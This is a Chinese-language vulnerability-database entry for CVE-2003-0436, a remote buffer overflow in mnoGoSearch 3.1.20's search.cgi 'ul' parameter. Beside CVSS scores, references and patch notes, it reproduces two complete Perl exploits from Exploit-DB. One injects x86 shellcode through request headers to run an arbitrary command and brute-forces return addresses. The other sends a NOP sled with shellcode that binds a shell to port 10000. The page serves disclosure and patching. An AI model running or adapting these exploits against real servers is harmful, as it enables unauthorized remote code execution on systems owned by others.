CVE-2003-0436
CVSS7.5
发布时间 :2003-07-24 00:00:00
修订时间 :2008-09-10 15:19:00
NMCOES    

[原文]Buffer overflow in search.cgi for mnoGoSearch 3.1.20 allows remote attackers to execute arbitrary code via a long ul parameter.


[CNNVD]MNOGoSearch search.cgi ul变量远程缓冲区溢出漏洞(CNNVD-200307-040)

        
        mnoGoSearch是一款多功能的基于WEB的搜索引擎。
        mnoGoSearch对用户提交的'ul'变量值缺少正确的边界缓冲区检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以WEB进程权限在系统上执行任意指令。
        'ul'变量用于指定搜索的URL值,攻击者提供超过5000字节的字符串作为'ul'变量,可覆盖堆栈中任意地址,精心构建提交数据可能以WEB权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0436
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0436
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200307-040
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/7865
(VENDOR_ADVISORY)  BID  7865
http://lists.grok.org.uk/pipermail/full-disclosure/2003-June/005543.html
(UNKNOWN)  FULLDISC  20030610 mnogosearch 3.1.20 and 3.2.10 buffer overflow

- 漏洞信息

MNOGoSearch search.cgi ul变量远程缓冲区溢出漏洞
高危 边界条件错误
2003-07-24 00:00:00 2005-10-20 00:00:00
远程  
        
        mnoGoSearch是一款多功能的基于WEB的搜索引擎。
        mnoGoSearch对用户提交的'ul'变量值缺少正确的边界缓冲区检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以WEB进程权限在系统上执行任意指令。
        'ul'变量用于指定搜索的URL值,攻击者提供超过5000字节的字符串作为'ul'变量,可覆盖堆栈中任意地址,精心构建提交数据可能以WEB权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        mnoGoSearch
        -----------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        mnoGoSearch mnoGoSearch 3.2.10:
        mnoGoSearch Upgrade mnoGoSearch CVS
        
        http://www.mnogosearch.org/download.html

- 漏洞信息 (22753)

MNOGoSearch 3.1.20 Search.CGI UL Buffer Overflow Vulnerability (1) (EDBID:22753)
cgi remote
2003-06-10 Verified
0 pokleyzz
N/A [点击下载]
source: http://www.securityfocus.com/bid/7865/info

mnoGoSearch 'search.cgi' has been reported prone to a buffer overflow vulnerability.

The issue is a result of a lack of sufficient bounds checking performed on user-supplied URI parameters that are passed to the 'search.cgi' application.

It may be possible for an attacker to exploit this vulnerability and have arbitrary code executed in the context of the web-server process.

#!/usr/bin/perl
# 
# [ reloaded ] 
# mencari_sebuah_nama.pl v2.0
# mnogosearch 3.1.x (http://www.mnogosearch.org) exploit for linux ix86
# by pokleyzz of d'scan clanz (05-2003)
#
# Greet: 
#	tynon, sk ,wanvadder, s0cket370, flyguy, sutan ,spoonfork, Schm|dt, 
#	kerengge_kurus, b0iler and d'scan clanz.
#
# Shout to:
#	#mybsd, #mylinux, #vuln
#
# Special thanks:
#	Skywizard of mybsd
#   
# ---------------------------------------------------------------------------- 
# "TEH TARIK-WARE LICENSE" (Revision 1): 
# wrote this file. As long as you retain this notice you 
# can do whatever you want with this stuff. If we meet some day, and you think 
# this stuff is worth it, you can buy me a "teh tarik" in return. 
# ---------------------------------------------------------------------------- 
# (Base on Poul-Henning Kamp Beerware)
#
#

use IO::Socket;

$host = "127.0.0.1";
$cmd  = "ls -la";
$searchpath = "/cgi-bin/search.cgi";
$rawret = 0xbfff105c;
$ret = "";
$suffsize = 0;
$port = 80;

my $conn;


if ($ARGV[0]){
	$host = $ARGV[0];	
}
else {
	print "[x] mnogosearch 3.1.x exploit for linux ix86 \n\tby pokleyzz of d' scan clanz\n\n";
	print "Usage:\n mencari_sebuah_nama.pl host [command] [path] [port] [suff] [ret]\n";
	print "\thost\thostname to exploit\n";
	print "\tcommand\tcommand to execute on server\n";
	print "\tpath\tpath to search.cgi default /cgi-bin/search.cgi\n";
	print "\tport\tport to connect to\n";
	print "\tsuff\tif not success try to use 1, 2 or 3 for suff (default is 0)\n";
	print "\tret\treturn address default bfffd0d0\n";
	exit;
}

if ($ARGV[1]){
	$cmd = $ARGV[1];	
}
if ($ARGV[2]){
	$searchpath = $ARGV[2];	
}
if ($ARGV[3]){
	$port = int($ARGV[3]);	
}
if ($ARGV[4]){
	$suffsize = int($ARGV[4]);	
}	
if ($ARGV[5]){
	$rawret = hex_to_int($ARGV[5]);	
}

#########~~ start function ~~#########
sub hex_to_int {
	my $hs = $_[0];  
	$int = (hex(substr($hs, 0, 2)) << 24) + (hex(substr($hs, 2, 2)) << 16) + (hex(substr($hs, 4, 2)) << 8) + + hex(substr($hs, 6, 2));
	 	
}

sub int_to_hex {
	my $in = $_[0];
	$hex = sprintf "%x",$in;
}

sub string_to_ret {
	my $rawret = $_[0];
	if (length($rawret) != 8){
		print $rawret;
		die "[*] incorrect return address ...\n ";
	} else {
		$ret = chr(hex(substr($rawret, 2, 2)));
		$ret .= chr(hex(substr($rawret, 0, 2)));
		$ret .= chr(hex(substr($rawret, 6, 2)));
    		$ret .= chr(hex(substr($rawret, 4, 2)));
    		
	}	
	
}

sub connect_to {
	#print "[x] Connect to $host on port $port ...\n";
	$conn = IO::Socket::INET->new (
					Proto => "tcp",
					PeerAddr => "$host",
					PeerPort => "$port",
					) or die "[*] Can't connect to $host on port $port ...\n";
	$conn-> autoflush(1);
}

sub check_version {
	my $result;
	connect_to();
	print "[x] Check if $host use correct version ...\n";
	print $conn "GET $searchpath?tmplt=/test/testing123 HTTP/1.1\nHost: $host\nConnection: Close\n\n"; 
	
	# capture result              
	while ($line = <$conn>) { 
		$result .= $line;
		};
	
	close $conn;
	if ($result =~ /_test_/){
		print "[x] Correct version detected .. possibly vulnerable ...\n";
	} else {
		print $result;
		die "[x] New version or wrong url\n";
	}	
}

sub exploit {
	my $rw = $_[0];
	$result = "";
	# linux ix86 shellcode rip from phx.c by proton
	$shellcode = "\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"
	             ."\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"
	             ."\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
	             ."\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	             ."\x41\x41"
	             ."/bin/sh -c echo 'Content-Type: text/hello';echo '';"
	             ."$cmd"
	             ."@";
	$strret = int_to_hex($rw);
	$ret = string_to_ret($strret);
	$envvar = 'B' x (4096 - length($shellcode));
	$envvar .= $shellcode;
	
	# generate query string
	$buffer = "B" x $suffsize;
	$buffer .= "B" x 4800;
	$buffer .= $ret x 200;
	
	$request = "GET $searchpath?ul=$buffer HTTP/1.1\n"
		   ."Accept: $envvar\n"
		   ."Accept-Language: $envvar\n"
		   ."Accept-Encoding: $envvar\n"
		   ."User-Agent: Mozilla/4.0\n"
		   ."Host: $host\n"
		   ."Connection: Close\n\n";
	
	&connect_to;
	print "[x] Sending exploit code ..\n";
	print "[x] ret: $strret\n";
	print "[x] suf: $suffsize\n";
	print "[x] length:",length($request),"\n";
	print $conn "$request";
	while ($line = <$conn>) { 
		$result .= $line;
		};
	close $conn;
	
}

sub check_result {
	if ($result =~ /hello/ && !($result =~ /text\/html/)){
		print $result;
		$success = 1;
	} else {
		print $result;
		print "[*] Failed ...\n";
		$success = 0;
	}
}
#########~~ end function ~~#########

&check_version;
for ($rawret; $rawret < 0xbfffffff;$rawret += 1024){
	&exploit($rawret);
	&check_result;
	if ($success == 1){
		exit;
	}
	sleep 1;
}

# generate shellcode


		

- 漏洞信息 (22754)

MNOGoSearch 3.1.20 Search.CGI UL Buffer Overflow Vulnerability (2) (EDBID:22754)
cgi remote
2003-06-10 Verified
0 inv
N/A [点击下载]
source: http://www.securityfocus.com/bid/7865/info
 
mnoGoSearch 'search.cgi' has been reported prone to a buffer overflow vulnerability.
 
The issue is a result of a lack of sufficient bounds checking performed on user-supplied URI parameters that are passed to the 'search.cgi' application.
 
It may be possible for an attacker to exploit this vulnerability and have arbitrary code executed in the context of the web-server process.

# shellcode binds shell to port 10000

use IO::Socket;

unless (@ARGV > 0) { die "Usage ./DSR-mnogo IP"}

$host = shift(@ARGV);
$ret = pack("l",0xbfbff670);
$nop = "\x90"x5402;

$shellcode = 
"\x31\xc9\xf7\xe1\x51\x41\x51\x41\x51\x51\xb0\x61\xcd\x80\x89\xc3\x52\x66\x68\x27\x10\x66\x51\x89\xe6\xb1\x10\x51\x56\x50\x50\xb0\x68\xcd\x80\x51\x53\x53\xb0\x6a\xcd\x80\x52\x52\x53\x53\xb0\x1e\xcd\x80\xb1\x03\x89\xc3\xb0\x5a\x49\x51\x53\x53\xcd\x80\x41\xe2\xf5\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x54\x53\x53\xb0\x3b\xcd\x80";


$exploit_string = $nop.$shellcode.$ret.$ret;


print "\nRemote Mnogo Exploit \n";
print "Code by inv \n\n";
print "Host: $host\n";

$remote = IO::Socket::INET->new(

	Proto	 	=>	"tcp",
	PeerAddr	=>	$host,
	PeerPort	=>	"http(80)",
	);

$remote->autoflush(1);

print $remote "GET /cgi-bin/search.cgi?ul=$exploit_string HTTP/1.0\n\n";

while ( <$remote> ) { print }

close $remote;


		

- 漏洞信息

11872
mnoGoSearch search.cgi ul Parameter Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-06-11 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

MNOGoSearch Search.CGI UL Buffer Overflow Vulnerability
Boundary Condition Error 7865
Yes No
2003-06-10 12:00:00 2009-07-11 10:06:00
Discovery of this vulnerability has been credited to pokleyzz <pokleyzz@scan-associates.net>.

- 受影响的程序版本

mnoGoSearch mnoGoSearch 3.1.20

- 漏洞讨论

mnoGoSearch 'search.cgi' has been reported prone to a buffer overflow vulnerability.

The issue is a result of a lack of sufficient bounds checking performed on user-supplied URI parameters that are passed to the 'search.cgi' application.

It may be possible for an attacker to exploit this vulnerability and have arbitrary code executed in the context of the web-server process.

- 漏洞利用

The following exploits are available:

- 解决方案

The vendor has addressed this issue in the current version of this software and a fix is available at the cvs repository for this product:

Conectiva has released a security advisory (CLA-2003:711) and fixes to address this issue. Details regarding applying fixes can be found in the referenced advisory, fixes are linked below.


mnoGoSearch mnoGoSearch 3.1.20

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站